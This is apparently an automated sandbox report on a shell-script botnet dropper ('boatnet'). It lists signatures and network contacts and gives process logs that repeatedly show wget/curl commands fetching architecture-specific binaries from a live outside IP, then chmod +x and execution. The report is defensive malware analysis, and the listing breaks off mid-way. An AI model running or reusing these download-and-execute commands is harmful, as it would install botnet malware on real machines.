Malware Analysis Report

2025-04-03 19:17

Sample ID 241029-c8lgba1ldl
Target 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh
SHA256 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b
Tags: defense_evasion discovery antivm
Score: 7/10

Analysis Overview

Score: 7/10

SHA256

9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b

Threat Level: Shows suspicious behavior

The file 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh was found to show suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-29 02:44

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-29 02:44

Reported

2024-10-29 02:47

Platform

debian9-mipsel-20240611-en

Max time kernel

49s

Max time network

52s

Command Line

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A (15 identical entries)

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A (15 identical entries)

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A (15 identical entries)

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/WTF /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh N/A

Processes

/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
US 154.216.19.166:3000 tcp (30 identical entries)

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-29 02:44

Reported

2024-10-29 02:47

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

28s

Max time network

131s

Command Line

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A (15 identical entries)

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A (15 identical entries)

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/WTF /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh N/A

Processes

/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 154.216.19.166:3000 tcp (30 identical entries)
GB 185.125.188.61:443 tcp (2 identical entries)
US 151.101.1.91:443 tcp (2 identical entries)
GB 89.187.167.7:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-29 02:44

Reported

2024-10-29 02:48

Platform

debian9-armhf-20240611-en

Max time kernel

24s

Max time network

51s

Command Line

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A (15 identical entries)

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A (15 identical entries)

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A (15 identical entries)

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A (15 entries, interleaved with the row below)
File opened for reading /proc/self/auxv /usr/bin/curl N/A (15 entries)

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/WTF /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh N/A

Processes

/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh

[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

/bin/chmod

[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

